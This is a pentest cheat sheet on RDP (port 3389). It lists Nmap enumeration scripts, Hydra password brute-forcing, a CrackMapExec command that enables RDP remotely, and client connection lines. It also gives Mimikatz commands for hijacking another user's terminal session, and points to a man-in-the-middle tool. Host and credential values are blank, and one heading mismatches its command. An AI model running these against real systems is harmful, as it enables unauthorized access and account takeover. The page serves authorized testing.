# Port 3389 | RDP ## Enumeration ### Nmap ```bash nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 ``` ## Bruteforce Brute forcing can easily lock user accounts. If possible enumerate the domain password policy before proceeding. ### Hydra ```bash hydra -L -P rdp:// ``` ### Medusa ```bash hydra -t 4 -l -P rdp:// ``` ## Connecting ### Crackmapexec Requires administrative privileges, enables RDP on the target host. ```bash crackmapexec smb '' -u '' -p '' -M rdp -o ACTION=enable # Enable RDP ``` ### rdesktop ```bash rdesktop -u rdesktop -d -u -p ``` ### xfreerdp ```bash xfreerdp /v:'' /u:'' /p:'' xfreerdp /v:'' /u:'' /p:'' +clipboard #Maps specified folder on attacking machine to RDP host xfreerdp /v:'' /u:'' /p:'' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share ``` ## **Hijacking** This method is not stealthy and will disconnect a users active terminal service session. However, you will also be able to connect to a disconnected session which could be stealthier. This method also requires privileges as SYSTEM on the terminal server host. ### **Mimikatz** ```powershell Invoke-Mimikatz -Command '"ts::sessions"' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNscRfvH3YVP8yItmF527%2Fmimikatz-ts_sessions.png?alt=media\&token=7aeb470e-5a19-4751-a725-ea97a480f039) Connect to the terminal services session. ```powershell Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"' ``` ## **Man-in-the-Middle** [SETH](https://github.com/SySS-Research/Seth) can be used to perform Man-in-the-Middle attacks over RDP. {% content-ref url="../everything-active-directory/adversary-in-the-middle/rdp-mitm" %} [rdp-mitm](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adversary-in-the-middle/rdp-mitm) {% endcontent-ref %}